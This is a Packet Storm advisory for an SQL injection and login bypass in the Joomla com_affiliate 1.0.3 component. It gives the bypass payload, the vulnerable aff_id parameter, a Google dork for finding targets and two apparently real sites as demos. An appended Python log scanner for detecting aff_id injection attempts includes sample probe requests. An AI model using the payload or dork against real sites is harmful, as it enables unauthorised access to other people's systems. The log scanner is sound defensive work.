Joomla Affiliate 1.0.3 SQL Injection

2016-06-13T00:00:00
ID PACKETSTORM:137449
Type packetstorm
Reporter Mojtaba MobhaM
Modified 2016-06-13T00:00:00

Description

                                        
`######################  
# Exploit Title : Joomla com_affiliate - SQL Injection  
# Exploit Author : Persian Hack Team  
# Google Dork : inurl:index.php?option=com_affiliate  
# Category: [ Webapps ]  
# Tested on: [ Win ]  
# Version: 1.0.3  
# Date: 2016/06/13  
######################  
#  
# PoC:  
# --Bypass Authentication  
# http://www.site.com/index.php?option=com_affiliate&view=login  
# UserName And Password '=' 'or'  
# --SQL Injection  
# http://www.site.com/index.php?aff_id=1  
# aff_id Parameter Vulnerable To SQL   
# Demo :  
# http://www.danieledewinter.com/it/programma-affiliati/login  
# http://www.azarshahd.com/en/index.php?option=com_affiliate&view=login  
#  
# Youtube : https://www.youtube.com/watch?v=bUMjwC5_IYM  
######################  
# Discovered by : Mojtaba MobhaM   
# Greetz : T3NZOG4N & FireKernel & Milad Hacking & JOK3R & Muhmmad Emad And All Persian Hack Team Members  
# Homepage : persian-team.ir  
######################  
  
  
`
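A defender-side check for the `aff_id` issue reported above, added here as an example (it is not part of the original advisory or of the component's code): it scans web access logs for `aff_id` values that are not plain integers. It assumes `aff_id` is a numeric identifier, as the advisory's `aff_id=1` suggests, and the function names and log lines are constructed for illustration. The login-form values travel in the POST body and do not appear in access logs, so they are out of scope here.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample access-log lines (combined log format); addresses and values are made up.
SAMPLE_LOG = """\
203.0.113.5 - - [13/Jun/2016:10:00:01 +0000] "GET /index.php?option=com_affiliate&view=login HTTP/1.1" 200 5120
203.0.113.5 - - [13/Jun/2016:10:00:07 +0000] "GET /index.php?aff_id=1 HTTP/1.1" 200 4811
198.51.100.9 - - [13/Jun/2016:10:02:13 +0000] "GET /index.php?aff_id=1%27 HTTP/1.1" 500 312
198.51.100.9 - - [13/Jun/2016:10:02:19 +0000] "GET /index.php?aff_id=1%2527%2520or HTTP/1.1" 200 4811
198.51.100.9 - - [13/Jun/2016:10:02:25 +0000] "GET /index.php?aff_id=1&aff_id=x%27y HTTP/1.1" 200 4811
"""

# Client address, timestamp, request target and status code of one log line.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3})')

# Assumption: a legitimate aff_id is a short run of ASCII digits.
AFF_ID_RE = re.compile(r"[0-9]{1,10}")


def is_valid_aff_id(value):
    """Strict allow-list check; the same rule belongs in the application itself."""
    return AFF_ID_RE.fullmatch(value) is not None


def suspicious_aff_id_requests(log_text):
    """Return (client, timestamp, decoded value, status) for each non-integer aff_id."""
    findings = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client, timestamp, target, status = match.groups()
        # parse_qsl percent-decodes once and keeps repeated parameters.
        for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            if name == "aff_id" and not is_valid_aff_id(value):
                # Decode a second time so double-encoded values are readable in the report.
                findings.append((client, timestamp, unquote(value), int(status)))
    return findings


if __name__ == "__main__":
    for finding in suspicious_aff_id_requests(SAMPLE_LOG):
        print(finding)
```

A 500 status next to a flagged value is worth triaging first, since it can indicate that the malformed input reached the database layer.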